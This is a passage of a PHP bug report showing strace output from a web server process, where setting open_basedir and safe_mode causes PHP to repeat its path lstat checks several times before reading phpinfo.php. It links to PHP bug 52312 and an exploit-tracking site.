26235 open("/usr/local/myspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
26235 open("/usr/local/myspace/webspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
26235 open("/usr/local/myspace/webspace/httpdocs/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
26235 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php/.htaccess", O_RDONLY) = -1 ENOTDIR (Not a directory)
26235 setitimer(ITIMER_PROF, {it_interval={0, 0}, it_value={20, 0}}, NULL) = 0
26235 rt_sigaction(SIGPROF, {0x2afef587dd80, [PROF], SA_RESTORER|SA_RESTART, 0x3916e302d0}, {SIG_DFL, [], 0}, 8) = 0
26235 rt_sigprocmask(SIG_UNBLOCK, [PROF], NULL, 8) = 0
26235 getcwd("/"..., 4095)              = 2
26235 chdir("/usr/local/myspace/webspace/httpdocs") = 0

26235 time(NULL)                        = 1278696735
26235 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
26235 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

And read the file.
26235 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php", O_RDONLY) = 16
26235 fstat(16, {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
26235 read(16, "\n", 8192) = 16
26235 read(16, "", 8192)                = 0
26235 read(16, "", 8192)                = 0
26235 close(16)                         = 0
26235 uname({sys="Linux", node="svilpar4", ...}) = 0
26235 time(NULL)                        = 1278696735
26235 writev(15, [{"HTTP/1.1 200 OK\r\nDate: Fri, 09 J"..., 173}, {"
\n

\n
highlight.bg"..., 4099}], 2) = 8204
26235 time(NULL) = 1278696735
26235 writev(15, [{"
HT"..., 4108}, {"1024
\nenabled Keep-Alive<"..., 4206}], 1) = 4206
26235 write(10, "212.48.14.186 - - [09/Jul/2010:1"..., 116) = 116
26235 shutdown(15, 1 /* send */) = 0
26235 poll([{fd=15, events=POLLIN}], 1, 2000) = 1 ([{fd=15, revents=POLLIN|POLLHUP}])
26235 read(15, "", 512) = 0
26235 close(15) = 0
26235 read(4, 0x7fff615ff5eb, 1) = -1 EAGAIN (Resource temporarily unavailable)
26235 accept(3,





Actual result:
--------------
If PHP_ADMIN_VALUE open_basedir "/usr/local/myspace/webspace" is set and safe_mode is On :

25933 accept(3, {sa_family=AF_INET, sin_port=htons(47433), sin_addr=inet_addr("212.48.14.186")}, [17179869200]) = 15
25933 getsockname(15, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("151.99.197.198")}, [17179869200]) = 0
25933 fcntl(15, F_GETFL)                = 0x2 (flags O_RDWR)
25933 fcntl(15, F_SETFL, O_RDWR|O_NONBLOCK) = 0
25933 read(15, "GET /phpinfo.php HTTP/1.0\r\nUser-"..., 8000) = 129
25933 gettimeofday({1278695388, 52976}, NULL) = 0
25933 stat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
25933 open("/usr/local/myspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
25933 open("/usr/local/myspace/webspace/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
25933 open("/usr/local/myspace/webspace/httpdocs/.htaccess", O_RDONLY) = -1 ENOENT (No such file or directory)
25933 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php/.htaccess", O_RDONLY) = -1 ENOTDIR (Not a directory)
25933 setitimer(ITIMER_PROF, {it_interval={0, 0}, it_value={20, 0}}, NULL) = 0
25933 rt_sigaction(SIGPROF, {0x2b80442fdd80, [PROF], SA_RESTORER|SA_RESTART, 0x3916e302d0}, {SIG_DFL, [], 0}, 8) = 0
25933 rt_sigprocmask(SIG_UNBLOCK, [PROF], NULL, 8) = 0
25933 getcwd("/"..., 4095)              = 2
25933 chdir("/usr/local/myspace/webspace/httpdocs") = 0

25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

First check
25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

Second check
25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

Third check (incomplete)
25933 lstat("/usr", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
25933 lstat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0

Final check and then read the file.
25933 open("/usr/local/myspace/webspace/httpdocs/phpinfo.php", O_RDONLY) = 16
25933 fstat(16, {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
25933 read(16, "\n", 8192) = 16
25933 read(16, "", 8192)                = 0
25933 read(16, "", 8192)                = 0
25933 close(16)                         = 0


ref : http://bugs.php.net/bug.php?id=52312

http://securityreason.com/exploitalert/7571?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+exploit_database+%28ExploitAlert+Database+-+Exploit+Database%29